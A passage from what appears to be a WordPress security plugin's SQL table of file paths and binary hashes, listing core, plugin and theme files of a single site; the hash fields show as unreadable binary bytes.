��=\"ږA:Uyn��ѫZщ�D>H��p�+\"','',0,'?'),('�$E�iO�)Uq�2\\','wp-content/plugins/wp-fastest-cache/js/dialog.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','93߲OK����H','~��z|�!��J������i���,��a���,`','',0,'?'),('�� ��x;��SD','wp-content/plugins/wp-cerber/assets/flags/lu.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0X]��K>ܥ�\n��Y','�S9^����b;M����E���;�\"v$�H���','',0,'?'),('�c �(��q3˭�','wp-content/plugins/wordpress-seo/src/deprecated/admin/class-recalculate-scores.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����iv�-C�4�','4$�8Zp5C�^�D@�w��Ho��%�����','',0,'?'),('�4mo~\"f��h��1��4','wp-content/plugins/wordpress-seo/src/presenters/abstract-indexable-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Jx��H�?h�b�`�sy','z�ϕ�j�D6Ĥ��NR�Y�,[VM2�VX���=�','',0,'?'),('�Ebl8�y���}����','wp-includes/js/tinymce/plugins/link/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*NȒmQ������','�`3�cYQ����9Wޭ#l���p�S+G��4','',0,'?'),('�V*ν���s��r�','wp-includes/wp-includes/css/dist/editor/style-rtl.css',0,'�Z���Ey��,��~','�Z���Ey��,��~','��t>\'�\"A�†ˊ��	�QN��\Z�gH��','',0,'?'),('�W�nJ�.\'/x��','wp-includes/blocks/embed/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���L�)_W\";��','����+�	_b�x@eu���5�yԷFO��','',0,'?'),('�`.dY,�o�u�dƋ','wp-includes/wp-includes/js/tinymce/themes/modern/theme.js',0,'�(3�o�U�2ŝU�2�','�(3�o�U�2ŝU�2�','�2.�pt�\"r�`)��\r.C�l�\\\Z��BIX','',0,'?'),('�iT�\\��p�tg.~�','wp-includes/wp-includes/css/jquery-ui-dialog-rtl.min.css',0,'u�+x)���A�v6@�@','u�+x)���A�v6@�@','�/��N��e$�������2:.�}b#�K}','',0,'?'),('�m>�\0��0X&�^�Q','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Http/CurlRequest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��pKz��`�)9_@�','��aғYe�q�7YTc�Ȋi$�W�ت�/�!�,','',0,'?'),('�s���ݓ�	��&�','wp-includes/wp-includes/css/dist/block-library/common-rtl.min.css',0,'ne��:ʎ)����hVH','ne��:ʎ)����hVH','�v7��7��a�L�zи�?9!D��4�','',0,'?'),('�u|�Ì�������/�','wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-select2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(l��a�O��l\\K�','*Q /d/ٜnK\'g��OO�4ŜS7��g��0��','',0,'?'),('����{��vZ7����','wp-content/themes/hitmag/js/jquery.flexslider-min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q:]U�f�}il�\'$','���6�I�|�i��*����\Z|�+�x�','',0,'?'),('��|�Aι�$PƼ','wp-includes/wp-includes/customize/class-wp-customize-background-position-control.php',0,'�QJt\"��!!�_�^	','�QJt\"��!!�_�^	','�릟�/Ԥ�o�kroQ���|E��Q�Z݁\ro','',0,'?'),('��oVu�4���;f��','wp-content/plugins/wordpress-seo/inc/interface-wpseo-wordpress-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d����uI��(��Y��','�\\Ou�ip\'(y]��	���+�\nZ���<}��','',0,'?'),('����W�kV������','wp-includes/blocks/comments-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','哊����ϦQ�u:','���\"�s��e��4���7i����g�ٕ�F�','',0,'?'),('���ڞq��\n�u{','wp-content/plugins/wp-smushit/app/assets/images/smush-graphic-integrations-upsell@2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<u�CJ<�K��U�','��և��Z��Ӽw�DBR\nu �VA�_�i�','',0,'?'),('��?���z6���aDz','wp-content/plugins/wordfence/images/loading.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K:�����m𙗣P�','j*�e����doX�~�7��&���N�9�|L���','',0,'?'),('��vs�p�~�X�M���','wp-includes/wp-includes/js/imgareaselect/jquery.imgareaselect.js',0,'-��?��ES+�','-��?��ES+�','���,��OT[9�pm��Ỵ�Ó,�����=f�','',0,'?'),('��R�\Z�F߱�H���','wp-includes/wp-includes/js/dist/data.js',0,'8;����2��/���G','8;����2��/���G','�e\\���%��`#J˘��\n��Ú�n��̭7�','',0,'?'),('�и+:3�XnN�tex�X','wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmSU5fChc-AMP6lbBP.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����{W�7h>���','�	2m��w��3�)zWg��v{Af��Hu`Co','',0,'?'),('�����Ș	�	\0}�P','wp-content/plugins/wordpress-seo/admin/capabilities/class-capability-manager-factory.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�*2�*ZY.�?�8�','LOo�Mٸz�ӫ7!���*����s�-���&','',0,'?'),('���ʆ��n�D㮖�(','wp-admin/css/install.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j��;A#蛴j��','����\'d\Z{-&�E���ٰ�[����5m','',0,'?'),('��j����5��f�j�','wp-content/plugins/wordfence/views/tools/options-group-live-traffic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!��L|�y+5*�M\0Qk','�����O�q��Fri���e�+�K�	�/;C','',0,'?'),('�����[�_�d�Ţ�','wp-content/plugins/wordpress-seo/src/presenters/admin/auto-update-notification-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M��:�{I����','�H����|��������I-���x�d','',0,'?'),('���%�t�Qg���','wp-content/plugins/wordpress-seo/css/dist/notifications-1851.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/x���.d�^��xԨ�','�\r��ZN��6��\\�g�pP̾;&�ג[','',0,'?'),('�\'����[�\0�v�R�I�','wp-content/plugins/wp-cerber/assets/flags/so.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c�{pE\n��M��|��l','�)30V�17�#3��q���{q��i�������n','',0,'?'),('�)ũ��2[�	�4�_a','wp-includes/class-walker-category-dropdown.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e��̷�8qOj���','�Iw�^���KHĶ\\�s��~BW��㺾fI','',0,'?'),('�+o�2��8�E�+K%;�','wp-includes/PHPMailer/PHPMailer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ƒ6+����z�-h��','�l�`2ĺ�|�ö�rd��+�[0q6�7\"�)','',0,'?'),('�9稈�8h�M�$��5','wp-content/plugins/wp-smushit/app/views/bulk-settings/meta-box.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����d>�C��n�4�','�k�sl��Me���X�\Z�l�Ҩ����S�ȇ','',0,'?'),('�:+[��g��CZ���','wp-includes/template-loader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z�	ҿ��܌~���','��\'4�h �䱺��[����E��%��J�H�','',0,'?'),('�B��[�\\�����|k','wp-includes/wp-includes/js/heartbeat.min.js',0,'�^���@H�l�\Z�g2�','�^���@H�l�\Z�g2�','e�x\'�s��v+�q�LW����/,��k�g%\0�','',0,'?'),('�H	 Ɩ86���In�','wp-content/plugins/wordpress-seo/src/loadable-interface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J\\;��T��U�*��@l;','�c��Ԥ\Zh��EA�2�f�ԾI��Ɲ�x�-','',0,'?'),('�H�F���I!���M9','wp-content/plugins/wp-cerber/assets/crb-logo-vn.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j��h��%t�J���','�Q��6�������V���\0\r��M�9��','',0,'?'),('�i2O�׍��+�s�X.�','wp-includes/js/jquery/ui/core.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����>�:�-\'��','���u?���T��N��KqQ*x/-Z��.��v','',0,'?'),('�l��戽�N�i��q','wp-content/plugins/wp-smushit/app/views/bulk/meta-box.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��l��Z�C��','�~YH.��\0u���u�g���Juq���o>�','',0,'?'),('�����b]�ٺ=�0_','wp-content/plugins/wordpress-seo/src/conditionals/news-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��MU�{�)����O�','QVQ�bK_���Ύ�Rƕ�]�-�mlY��<9iqV','',0,'?'),('����O�z\nql��u�H','wp-content/plugins/wp-cerber/assets/flags/iq.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=��N\Z��qVJ\r)','���SY/�@��浕�s��^j�Ȫ\\�-��ȑ','',0,'?'),('���΍cDޮ��;p�D','wp-includes/wp-includes/js/mediaelement/wp-mediaelement.min.css',0,'ꕂv��EK�‡?\r�~_','ꕂv��EK�‡?\r�~_','!?�[��_���r��=&�\n�-%!y��\r�','',0,'?'),('��@<N�8iy�����','wp-includes/blocks/separator/theme-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�W$��($�q����',',�g	�2�u��j��d2|߃�V��uW�\\�e�','',0,'?'),('���P���M�˝�=U','wp-content/plugins/wordfence/views/dashboard/status-payment-expiring.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʿm�\\m10��f*�)','	m��Y�_����\\\'.��]���WyW0��0','',0,'?'),('���hg�	��>n�dZ','wp-includes/wp-includes/sodium_compat/src/Compat.php',0,'$?6/�%��k�<j��@�','$?6/�%��k�<j��@�','����\r�/�t��:to���7�L�~���QLl~S','',0,'?'),('��>ݶ�����߁��','wp-content/plugins/redirection/database/schema/400.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T�!	\Z�A�[4�\n�','�F5J��|M�[���,�K��b�(�5Ҏ7�.n','',0,'?'),('���e��-\n�yV','wp-includes/sodium_compat/src/Core32/ChaCha20/IetfCtx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���|�Ww�b>E��yJ','�\'�����~�6ȝ\nB���agz���d��Q','',0,'?'),('������PU��ac��','wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�YA��G=b�u���','z�,ͥ���t	<{@Y{�iy��s���c�(S�L','',0,'?'),('��nv��Z�YV��','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/init.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��x9S���\r�u�>',')6�H�$�/�j2m���O�o�<4�v)�giAp','',0,'?'),('��J��\Z�W��o','wp-content/plugins/redirection/database/database-upgrader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����ݜ�d�v�','Z�Z̨�3Sε�6b�Z�o�E�s�8�Ü�Ď�','',0,'?'),('���<��(���u�','wp-content/themes/hitmag/inc/widgets/block-posts-grid.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�zg��q�+j�A.\nJ','��}�\'>\r\\�<ܜ��&qF_�M@�,4�L1�)��r','',0,'?'),('�Z��D��l�=�컫','wp-content/plugins/wordfence/views/waf/waf-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]oFo�O�\"I�R��','�L�H�?-Z(G	�I�L��L�Dν\Z�����۲|','',0,'?'),('����{�/趒�Z�','wp-includes/rest-api/endpoints/class-wp-rest-edit-site-export-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��	��n�.�}/|�̻','������u�6�׉ q��~p~boQ��d%1�j','',0,'?'),('�\Z�������B~W�b�','wp-content/plugins/wordpress-seo/src/values/open-graph/images.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4�1��8���3��1�I�','�2���ʏE�t��6.F�{����G�A���q�','',0,'?'),('�!�d�{�:ɬ�P ](M','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/Handler/CurlFactory.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��i�]���b�F\0','{K��0(�n��[��(�����z�\\*���','',0,'?'),('�A��MT̓�Y#&�a�','wp-content/plugins/wp-smushit/core/integrations/class-common.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���8C\"���-3~','��dс��\nal(��a>���:OD�uY��?','',0,'?'),('�B%v6�I\"Jb��4ӡT','wp-admin/link-manager.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ba[��%��q�~zE\Z�','!��X%��	���C��Q�+vz�.,4K���(','',0,'?'),('�\\���׽�X�:��k','wp-content/plugins/disable-gutenberg/fonts/awesome/fontawesome-webfont.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z������� 6�>','��@⣂�L�EQ��(�ie��q[N|&���Ð�','',0,'?'),('�y�T\Z*�6\'�vlA�','wp-includes/wp-includes/css/customize-preview-rtl.min.css',0,'E��?��nZ���d�-','E��?��nZ���d�-','G���i�\rl�iU^��n��rm�5��Ώۻ�\\l�','',0,'?'),('�~O^A�����\0n','wp-content/plugins/wordpress-seo/packages/js/images/connection-assistant.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#@\n��9[�\0E2','\"J�4�+T�^��\n�`��KB@����8�N','',0,'?'),('����w.(	�=���','wp-includes/blocks/navigation-link/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','49�/\'�h!�?��?','I�P��%4��I��kR��7��r��#��P�f,','',0,'?'),('����I6���F�','wp-includes/blocks/rss/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D���\0!!i��','�u��\r�>u`�37(�F�^� �)L�}�(�\"l','',0,'?'),('��>�A�B�7�Sz!�e','wp-admin/includes/export.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','͊�Da;HA�J\0�-X','����Ը��x�Y��\0�唋���Xý+���','',0,'?'),('���p���\Zi�䡮','wp-includes/wp-includes/class-wp-hook.php',0,'+%Yj�͑�Q	�^��(','+%Yj�͑�Q	�^��(','�@I*�۷�����}O�&?����8��q�','',0,'?'),('��2P&��zZ��.��ۍ','wp-includes/blocks/term-description.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���s0Q���!/�u','h��yaG�JqnU�0��$�4v0��0���','',0,'?'),('��|0���O�+�]lU�','wp-includes/js/dist/a11y.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ik���\n�aͅ��)��w','<�d\Z���K�%]��O�G~Z\r�c�ybz7a׾','',0,'?'),('��\n�8�^XQ��-�l','wp-content/plugins/wordpress-seo/vendor_prefixed/symfony/dependency-injection/ParameterBag/ParameterBagInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|�P�H�S�E\\-��R','k�ٽ�+��/���2�\n� Kl�k�\Zv	���','',0,'?'),('���+�v��2�����','wp-content/plugins/disable-gutenberg/disable-gutenberg.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�L��;8��Y��p�','����s���1ʎ���3gsΊKE�up��O\\','',0,'?'),('���T�양�:t[��','wp-includes/Requests/Exception/HTTP/410.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�$�-4�3R�ۢ�U�','��9�f/3MM;#GڪWO&�tS�O\Z���Ƙ�','',0,'?'),('���s?��P�h#�%�','wp-content/plugins/wordpress-seo/src/integrations/blocks/structured-data-blocks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5Jנ��|��՜?>��','��KQ�ɑ�+�\Z�aZ.��^Ss��	5�a��)','',0,'?'),('�)����Yh�.�;��š','wp-includes/Requests/Exception/HTTP/412.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Zcu�	L����t�p','S�A�4c\\D�56-��#��d*���ҽӾ�R���','',0,'?'),('�,��F1,iI��s��','wp-content/plugins/wp-cerber/assets/fonts/roboto/LICENSE.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s�6ɮ�ͯvB,O�','ݬ�IS�P\"�a�� 7J�6�QSv���_��y�','',0,'?'),('�-����֢]Mh��','wp-content/plugins/wordpress-seo/src/actions/importing/aioseo/aioseo-general-settings-importing-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��p@[A��V��([','�b��v�.j�R�g�ۓN��x�����(a	��8','',0,'?'),('�1�eU��MV��^��','wp-admin/includes/misc.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���I�*R_�T�','u�rpD���¦�‰&;JXs��d��>�\n���','',0,'?'),('�D�R�#��ϖ��','wp-content/plugins/all-in-one-wp-security-and-firewall/images/notices/wp_optimize_logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��=�0��$.C�(q','o%Yx�0�\".ʄU%�8��5���+���','',0,'?'),('�F_q���C�F!o4p��','wp-content/plugins/wordfence/views/scanner/scan-starter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1��x����h3\\','��U�~��A�Vkr�%R�x$p��Z1�\"�U�','',0,'?'),('�wW� Ů�Q�⍳+��','wp-includes/wp-includes/js/customize-preview-nav-menus.min.js',0,'k�m�	i13-����','k�m�	i13-����','��%N�q�4��6�\n$^o����Ĝ7k��.�','',0,'?'),('��*+�~�Fv�[��aj','wp-content/plugins/wp-smushit/core/modules/class-webp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�jC�5o[%�U��K','�[X.��F�	ƛ	�ŋd�S�~+��rf','',0,'?'),('���y�0s���?','wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-category-permalink-watcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����{s#��%ŷ�','5Y3|��q\\(�b��y�`���HV�v�3OG','',0,'?'),('���Fճ�D~֫�Cʽ�','wp-includes/css/dist/edit-post/classic.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���K�k��L�t��','���<���)L!�Ðj�]��R�!�)���K�$','',0,'?'),('��\0�>#����z(','wp-includes/bookmark.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\FJo8�m6��Ɂ���','�yߐY�=.`$���\076��З5�Ńq�','',0,'?'),('����	�Q2���e','wp-includes/wp-includes/js/jquery/ui/accordion.min.js',0,'���e�o-�����q','���e�o-�����q','���l�:�ͦ]�n���9cF����?�c','',0,'?'),('���������}��','wp-admin/media-upload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q�W݈\\w&�c�P�','���j�+��]-�HO����gĩ>\"��O�,','',0,'?'),('���+;�\'@�G�D�z','wp-content/plugins/wordpress-seo/src/helpers/curl-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4�zLe%)7$�����','�)�2\'���X�G2yX�5�~�I0�D&݌��','',0,'?'),('��}�����X4�1�','wp-content/plugins/wp-cerber/assets/flags/gf.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^\"E#ܝFg[jr',';i�6E]���\Z���\\��`V�>>��P4C�','',0,'?'),('���t�,�!h��O��0','wp-includes/wp-includes/js/jquery/ui/effect-pulsate.js',0,'�*\r�I�͕;t��W��','�*\r�I�͕;t��W��','�����BD8�=~�b���wJ=�� ǐ�E��','',0,'?'),('���@��\'�y����q�','wp-includes/blocks/query-pagination/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','},)��dc�E���9','	�Zټ�[��@��%9�ƙ�,26ST���&nU','',0,'?'),('��kV��7���2�+','wp-includes/blocks/heading/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9Fs)�#�1��� 	','�|\Z��6���Q_R�|��)Eo�vS�w,%�~�','',0,'?'),('��u�6g��*��$!68','wp-content/plugins/wordpress-seo/src/actions/alert-dismissal-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��o�w�B��\Z�t\0�o','�a�p@�n�6{U0���\r�T�Y�6c��=T}n','',0,'?'),('���d�R�OXf�f��','wp-includes/wp-includes/js/wp-embed.min.js',0,'�R%�qU�0�8}_��','�R%�qU�0�8}_��','ޚT�d����U�2#*_�D�WQT�n�I%Ǭ�','',0,'?'),('���P���	�W��','wp-content/themes/hitmag/inc/kirki/core/class-kirki-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Zu�:F9a%�Ȣ�','�E�H�=K��w#�V�@�Ճ]�_��|�N','',0,'?'),('�J�#﫹#��!L��\Z','wp-content/plugins/wordpress-seo/src/presenters/admin/notice-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X6�������$l��T��','�Z���S��jP�m�}C�=⛘�t�����f','',0,'?'),('��J�H6�KF��p~�','wp-includes/blocks/social-link/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\r��,��[�&x,u�.','�\"��H��@����h��X�՗������#�','',0,'?'),('���P�w���0�h�9','wp-includes/js/tinymce/plugins/fullscreen/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y�����2İ\rm}%��','3��].�BCBe��ʢ�S�( ?�Z{����','',0,'?'),('�2-��2�P@7��m��J','wp-content/plugins/wordpress-seo/vendor_prefixed/chillerlan/php-qrcode/src/Output/QRString.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L]mL��\n\Zw��x','�G��S�e��;�4�ʻI���*:X��R�]','',0,'?'),('�2jzv�8�w�)q�\Z�','wp-content/plugins/wp-smushit/app/assets/images/graphic-smush-cdn-default@2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���SĀ	\\�-0�cb','�4�.�^��y!T#\"��j{�� w�U�uEPϏm4:','',0,'?'),('�4u�c&�|�+\'���','wp-includes/wp-includes/images/crystal/document.png',0,'�\'^c�s���D��3T\\','�\'^c�s���D��3T\\','g�t�( Ŏ�k`5͒��J��M5���:j�','',0,'?'),('�5,�>-�J�j�T�','wp-content/plugins/wp-cerber/assets/flags/bz.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�fCW��Ѡ!�3HVp','-���}k8Bֲ����b{���^!Iօ�$','',0,'?'),('�;j��|�:1/��','wp-admin/site-health-info.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���@��K��i(z��','�}b��\\]LҢ�=n��s��\Z���Z��;','',0,'?'),('�B y�w�+���|t��','wp-includes/class-wp-http-requests-response.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O�TP^��rbb!d�','�\Z���[Щǩ�{S.Ws:���e��\"#z�[N','',0,'?'),('�G3\n�D���I����','wp-content/themes/hitmag/inc/kirki/modules/gutenberg/class-kirki-modules-gutenberg.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q6n8�!(Y�	ZW#A','�%c4�Z����n֌�C�%�U��ũ�t�{�7','',0,'?'),('�J�&_#��3S�q���','wp-admin/images/spinner-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1����2��^#�8��','��#�˒�=$c��6�����	B��4�6','',0,'?'),('�N�s�ئԿ�����','wp-includes/wp-includes/class-wp-image-editor-gd.php',0,'z�RŖ���z`�T��','z�RŖ���z`�T��','�	U� 5�BOu��>F���p_��}�d�.��','',0,'?'),('�V+@�0���p�ɏhi','wp-includes/rest-api/class-wp-rest-response.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��8ѸW��B;���','��O)��u��O���:�D�����J��&�$','',0,'?'),('�Z���)_��w�\'$�X�','wp-includes/class-wp-block-parser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','16�O���یB�90q','��1����{rH��$5B�E�#u��Q���Ȭ','',0,'?'),('�^Sx_?u�G�D���','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/H.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��H�d9<C�ˤ���bl','K�.Bo����ࣸ�v��b�%����S~1�K��','',0,'?'),('�b~5�a���I@)*�','wp-includes/class-wp-site.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!�N~M��(ߡ�=��','�+ğ)��Adjrl�C(I�h뾩^\n~�� ��^�','',0,'?'),('�fG<�@៝N���-','wp-admin/includes/class-wp-privacy-requests-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h� \ZC��Z��b�','.�3d����\n[��L[���/�\'��Q�XG','',0,'?'),('�x9p�2���w���B','wp-includes/ms-network.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���nc��>-���H','[�)�?�Q�j\'b�@��U��Bt�K{�H:','',0,'?'),('�z��a�٧:mH��U�','wp-includes/wp-includes/js/heartbeat.js',0,'\r���>������q����','\r���>������q����','��~�8��|\nvS̃M_ZD�&���K��-\Zې�','',0,'?'),('��D!:�+��9�Ӿ��','wp-content/themes/hitmag/inc/kirki/modules/post-meta/customize-preview.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f-c�L�����Y+�','��J\\��Ϡ8\r^S����v���Љ�r9\0F�\r','',0,'?'),('��-�y��[�(�<�%C','wp-content/plugins/all-in-one-wp-security-and-firewall/css/wp-security-admin-styles.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{v�0ƪ�A3u�T��',';�ǐs𙸡��:��;Mȴ�N�x�Cd/��+�','',0,'?'),('��\\:��ڈ��)g,\\','wp-includes/images/smilies/icon_twisted.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L��v[?��+*8��;�','V�H�hK�����\n���p�����;.�&/E�','',0,'?'),('��!��E��S7�x����','wp-content/wflogs/rules.php',0,'T�\r�\"��ȋ&�{�','T�\r�\"��ȋ&�{�','���o1V04��ٱK:�\Z�e�N�`�9�ڀ','',0,'?'),('������>2\\o�)���','wp-includes/Requests/Exception/HTTP/Unknown.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"Ņ\'�k?�:~����','@���3�#\Zж/*t\r��6<X�\r�IF','',0,'?'),('���3v�U�\Z3�P�^O ','wp-admin/css/widgets-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����iY�\rG\\','�e99K5��b�Y�z�.D��h.�)�\'93�O�x','',0,'?'),('��L �U���f��u�<','wp-admin/images/icons32-vs.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�P*���{>v��Uf','����?U��z��P\\��@�`�8g;\r����E','',0,'?'),('���`D\r���7	��','wp-includes/wp-includes/sodium_compat/src/Core/Poly1305/State.php',0,'V���zȒ��`(�lE�','V���zȒ��`(�lE�','������⯠盍������ԵJ�\\�_�z[','',0,'?'),('���Y����x���Q','wp-content/plugins/wordpress-seo/src/integrations/front-end/wp-robots-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r`Rb_�n+f����','�P]�F�\Z;O�Ȣ��c�J���t�B��c�g','',0,'?'),('��<�^�a�Z�&ٚ|��','wp-includes/wp-includes/class.wp-dependencies.php',0,'�1�n��}%�3t�','�1�n��}%�3t�','���B-�[i<��6J�Zu*3��Q�q�xL\0','',0,'?'),('���o�w���Ў�696I','wp-includes/random_compat/cast_to_int.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y)z��H/��>�','֜_�[2(y+9}Q�I�*\0A��\Z�ʁfg�>�','',0,'?'),('��)�KK�;���t~�','wp-content/plugins/wp-cerber/languages/wp-cerber-es_ES.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�bwn�߃�|�7�w��','�j�w��h�Gv�MxT�~Vew<\"��`��J�<�','',0,'?'),('��k��{m�%� �D�','wp-content/plugins/wp-cerber/languages/wp-cerber-pt_BR.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4|S�5w76�ae�.��','����!@�08:?\'�d���>\r������	Bn','',0,'?'),('����+��D�����y�','wp-content/plugins/wp-smushit/app/common/progress-bar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']��B�JN��)I���/�','�O\\Dм\ZQ�N����Ĵ\"0����1�BT��','',0,'?'),('������x�ih��›�','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/kirki.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�\r�g��9eO��G\"2','����D\\��hA��xBm�p��B�MC